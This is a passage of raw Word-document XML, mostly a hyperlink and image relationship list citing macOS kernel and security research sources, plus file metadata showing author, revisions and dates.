Target="webSettings.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/About/About.html" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trailofbits.com/resources/fun_and_games_with_osx_and_iphone_payloads_paper.pdf" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pikeralpha.wordpress.com/2014/06/04/os-x-10-10-yosemite-dp1-kernelcache/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://launchd.info/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/technotes/tn2004/tn2118.html" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://devstreaming.apple.com/videos/wwdc/2015/706nu20qkag/706/706_security_and_your_apps.pdf" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Operating_system" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:L:\Book\Mac%20Book\Mac-OSX-Internals\%5bMac.OS.X&#24320;&#21457;&#31995;&#21015;&#30005;&#23376;&#20070;%5d.Mac.OS.X.Internals.-.A.Systems.Approach.chm::/0321278542/ch09lev1sec7.html" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://src.chromium.org/viewvc/chrome/trunk/src/base/mac/os_crash_dumps.h?revision=95618" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/System_Integrity_Protection" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://weizhenwei.github.io/blog/2014/12/25/x86-64zhi-ling-he-abi/" TargetMode="External"/><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s://developer.apple.com/library/mac/technotes/tn2004/tn2118.html" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.westwind.com/reference/OS-X/background-processes.html" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xoyip.hatenablog.com/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cocoachina.com/bbs/read.php?tid=234363" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Apple_Inc." TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Sudo" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/presentations/bh-dc-10/Suiche_Matthieu/Blackhat-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-wp.pdf" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://contagiodump.blogspot.com/2013/11/osx-malware-and-exploit-collection-100.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/Architecture/Architecture.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.emf"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.timschroeder.net/2012/07/03/the-launch-at-login-sandbox-project/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/printf.3.html" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://an.enduringcolumn.com/2013/08/exceptional-exception-handling.html" TargetMode="External"/><Relationship Id="rId44"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yperlink" Target="https://en.wikipedia.org/wiki/System_Integrity_Protection" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.freebuf.com/articles/system/97411.html" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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gif"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnblogs.com/andypeker/p/4360540.html" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://developer.apple.com/documentation/Darwin/Conceptual/KernelProgramming/build/chapter_18_section_5.html" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pikeralpha.wordpress.com/2014/06/04/os-x-10-10-yosemite-dp1-kernelcache/" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Darwin_(operating_system)" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s3.amazonaws.com/s3.synack.com/infiltrate.pdf" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stackoverflow.com/questions/14473001/how-to-monitor-a-process-on-os-x" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/documentation/GraphicsImaging/Conceptual/PDFKitGuide/PDFKit_Prog_Intro/PDFKit_Prog_Intro.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.gif"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Process_(computing)" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/p/volatility/wiki/MacMemoryForensics" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html" TargetMode="External"/><Relationship Id="rId24"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en.wikipedia.org/wiki/System_Integrity_Protection" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://svn.tweakbsd.org/wsvn/Kext.Heroine/trunk/Kext%20Tool/?" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lackingrhoticity.blogspot.com/2013/08/handling-crashes-on-mac-os-x.html" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://flanker017.me/" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.jianshu.com/p/0572336a077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tackoverflow.com/questions/603785/environment-variables-in-mac-os-x" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/documentation/IDEs/Conceptual/gdb_to_lldb_transition_guide/document/lldb-command-examples.html" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Privilege_(computing)" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnblogs.com/andypeker/p/4385802.html" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/raaxis/nds4ios" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.gif"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/technotes/tn2004/tn2118.html" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/System_file" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s3.amazonaws.com/s3.synack.com/Synack_Shakacon_OSX_Malware_Persistence.pdf" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://reverse.put.as/papers/" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/content/technotes/tn2004/tn2123.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lipeng.de/blog/life/tech/994/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/steakknife/07df81ffe382d5f257d7" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/System_Integrity_Protection" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/anatol/xnu/blob/master/osfmk/kern/exception.c" TargetMode="External"/><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hyperlink" Target="https://derflounder.wordpress.com/2015/10/01/system-integrity-protection-adding-another-layer-to-apples-security-model/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpeg"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:L:\Book\Mac%20Book\Mac-OSX-Internals\%5bMac.OS.X&#24320;&#21457;&#31995;&#21015;&#30005;&#23376;&#20070;%5d.Mac.OS.X.Internals.-.A.Systems.Approach.chm::/0321278542/ch10lev1sec2.html" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.mit.edu/darwin/src/modules/xnu/osfmk/man/" TargetMode="Externa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29.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nvsio/qemu-ios" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/technotes/tn2004/tn2118.html" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/System_folder" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Code_injection" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/synack/knockknock" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.mit.edu/darwin/src/modules/xnu/osfmk/man/mach_msg_header.html" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dustin.schultz.io/blog/2010/11/15/mac-os-x-64-bit-assembly-system-calls/" TargetMode="External"/><Relationship Id="rId122"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hyperlink" Target="https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/build/build.html" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/OS_X_El_Capitan" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/About/About.html" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/mac/documentation/DeviceDrivers/Conceptual/AccessingHardware/AH_IOKitLib_API/AH_IOKitLib_API.htm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A1D5-C048-4576-A053-5F5DF00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1</TotalTime>
  <Pages>1</Pages>
  <Words>114022</Words>
  <Characters>649926</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>5416</Lines>
  <Paragraphs>1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y Li (RD-CN)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Moony Li (RD-CN)</cp:lastModifiedBy>
  <cp:revision>620</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-03-27T11:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-03T02:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>